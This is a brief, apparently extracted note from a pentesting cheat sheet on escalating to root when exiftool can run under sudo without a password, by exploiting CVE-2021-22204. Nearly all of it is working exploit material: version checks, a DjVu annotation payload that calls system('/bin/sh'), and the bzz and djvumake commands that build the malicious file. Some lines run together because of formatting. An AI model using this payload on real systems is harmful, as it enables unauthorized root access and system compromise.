Sudo Exiftool Privilege Escalation
Investigation
(root) NOPASSWD: /usr/local/bin/exiftoolArbitrary Code Execution (CVE-2021-22204) version 7.44+
exiftool -verExploitation
(metadata "\c${system('/bin/sh')};")bzz exploit exploit.bzzsudo apt install -y djvulibre-bin
# INFO: Create the initial information chunk.
# BGjp: Create a JPEG background chunk.
# ANTz: Write the compressed annotation chunk with the input file.
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=exploit.bzzLast updated